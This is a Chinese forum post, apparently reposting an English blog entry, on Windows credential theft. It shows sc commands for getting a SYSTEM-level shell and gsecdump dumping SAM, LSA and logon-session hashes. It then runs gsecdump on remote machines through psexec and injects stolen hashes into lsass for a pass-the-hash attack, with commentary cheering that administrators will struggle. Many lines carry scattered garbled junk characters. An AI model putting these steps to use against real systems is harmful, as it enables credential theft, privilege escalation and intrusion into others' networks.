HASH注入式攻击

admin

o get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

& ]- ]! q% W( x' B) D" Z# SC:\>sc start shellcmdline
[SC] StartService FAILED 1053:
7 H( m8 ^# J& O  x
The service did not respond to the start or control request in a timely fashion.
- i( u  w. n% m" E0 j& O& r/ d$ k
C:\>sc delete shellcmdline
% H  F8 d/ g6 F$ j8 \[SC] DeleteService SUCCESS

" e9 _. {: a' E" y------------

" N. ], r0 Z6 u/ K) l+ oThen in the new DOS window:

! W- J( `. a' a1 G0 _5 o' j& ~, \, ^' pMicrosoft Windows XP [Version 5.1.2600]
4 F# L- h2 h) K(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
+ B. g4 D8 B, d0 g! S" v% j) e# c
9 ]7 ]& ?: h: X) d: Q# bC:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
& c7 L1 Z7 C& nusage: gsecdump [options]

options:
: Y( Z) D( Z+ d6 g0 Y-h [ --help ] show help
( s- Z) i& v; L; q-a [ --dump_all ] dump all secrets
0 e# G6 S. s+ M7 N-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
) ?# g) N1 W% n: h4 J-s [ --dump_hashes ] dump hashes from SAM/AD
: o% Z  f- W& n- I" P: o' a7 P
& U& N; \7 v6 f: o8 x' h0 v  T. TAlthough I like to use:
& P% m* Q; u6 l' p/ j  }8 j
1 m  J9 s* b2 g: L* yPsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - 链接标记[url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

9 C/ b+ o$ U8 ~1 `' [* Wto get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

% p* q! F- F9 W6 e6 D提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
5 ^. i; m- c# p# R2 G. T2 q: a原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。
# [1 p/ |* k  h" R. C# R